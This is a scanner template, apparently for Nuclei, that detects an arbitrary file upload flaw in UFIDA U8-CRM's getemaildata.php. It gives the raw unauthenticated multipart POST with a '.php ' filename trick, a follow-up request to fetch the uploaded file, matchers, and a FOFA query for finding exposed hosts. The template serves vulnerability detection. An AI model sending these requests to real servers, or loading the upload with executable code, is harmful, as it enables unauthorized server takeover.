61 lines
1.9 KiB
YAML
61 lines
1.9 KiB
YAML
id: yonyou-u8-crm-fileupload
|
|
|
|
info:
|
|
name: UFIDA U8-CRM getemaildata - Arbitary File Upload
|
|
author: SleepingBag945,pussycat0x
|
|
severity: critical
|
|
description: |
|
|
There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.
|
|
metadata:
|
|
max-request: 2
|
|
fofa-query: body="用友U8CRM"
|
|
verified: true
|
|
tags: yonyou,fileupload,u8-crm
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Length: 300
|
|
Cache-Control: max-age=0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Origin: null
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: zh-CN,zh;q=0.8
|
|
Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0
|
|
|
|
------WebKitFormBoundaryAVuAKsvesmnWtgEP
|
|
Content-Disposition: form-data; name="file"; filename="%s.php "
|
|
Content-Type: application/octet-stream
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundaryAVuAKsvesmnWtgEP
|
|
Content-Disposition: form-data; name="upload"
|
|
|
|
upload
|
|
------WebKitFormBoundaryAVuAKsvesmnWtgEP--
|
|
|
|
|
|
- |
|
|
GET /tmpfile/{{path}}.tmp.mht HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1==200 && status_code_2==200"
|
|
- "contains(body_2, '{{randstr}}')"
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body_1
|
|
internal: true
|
|
name: path
|
|
group: 1
|
|
regex:
|
|
- '([a-zA-Z0-9]+)\.tmp\.mht' |